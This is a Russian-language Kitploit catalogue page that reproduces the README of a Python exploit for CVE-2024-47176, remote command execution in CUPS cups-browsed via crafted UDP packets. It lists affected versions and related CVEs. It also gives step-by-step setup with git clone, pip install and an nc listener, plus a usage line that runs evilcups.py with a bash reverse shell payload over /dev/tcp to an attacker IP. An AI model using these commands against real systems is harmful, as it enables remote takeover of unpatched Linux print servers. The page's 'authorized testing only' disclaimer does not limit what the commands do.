Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-47176 — Эксплойт на Python для CVE-2024-47176, позволяющий удаленно выполнять команды в CUPS cups-browsed через специально созданные UDP-пакеты. Включает доставку полезной нагрузки reverse shell для авторизованного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/gumerzzzindo/cve-2024-47176
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

Эксплойт на Python для CVE-2024-47176, позволяющий удаленно выполнять команды в CUPS cups-browsed через специально созданные UDP-пакеты. Включает доставку полезной нагрузки reverse shell для авторизованного тестирования на проникновение.

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-47176 — Удаленное выполнение команд в CUPS

CVE CVSS Python Platform License

Только для образовательных целей и авторизованного тестирования на проникновение.


Содержание

  • Описание
  • Затронутые системы
  • Связанные CVE
  • Предварительные требования
  • Настройка
  • Использование
  • Отказ от ответственности

Описание

CUPS (Common UNIX Printing System) — это открытая система печати, управляющая сетевыми принтерами. CVE-2024-47176 нацелен на демон cups-browsed, который привязывается к INADDR_ANY:631 и слепо доверяет пакетам от любого источника.

Создав вредоносный UDP-пакет, инициирующий IPP-запрос Get-Printer-Attributes, злоумышленник может заставить cups-browsed подключиться к контролируемому им серверу — и в сочетании с уязвимостями ниже добиться произвольного удаленного выполнения команд.


Затронутые системы

КомпонентУсловие
cups-browsedПрослушивает UDP 631 (по умолчанию)
CUPS < 2.4.11Неисправленные версии
Системы Linux с открытым CUPSПорт 631 доступен для атакующего

Связанные CVE


Предварительные требования

  • Целевая машина с открытым портом 631 (IPP/UDP)
  • Python 3.x на вашей атакующей машине
  • nmap (необязательно, для разведки)
  • Прослушиватель netcat для обратной оболочки

Настройка

1. Клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. Установите необходимую зависимость Python:

root@kitploit:~
pip install ippserver

3. Запустите прослушиватель на вашей машине:

root@kitploit:~
nc -lvnp <PORT>

Использование

root@kitploit:~
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

Пример — обратная оболочка:

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

После запуска эксплойта инициируйте задание печати на цели (или дождитесь автоматической проверки), чтобы выполнить полезную нагрузку.


Отказ от ответственности

Этот репозиторий предназначен исключительно для образовательных целей и авторизованных исследований в области безопасности. Использование этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконным и неэтичным.

Скачать инструмент
CVEОписание
CVE-2024-47176cups-browsed доверяет любому UDP-пакету на порту 631
CVE-2024-47076libcupsfilters не санирует атрибуты IPP
CVE-2024-47175libppd внедряет несанированные данные в файлы PPD
CVE-2024-47177cups-filters позволяет выполнение команд через PPD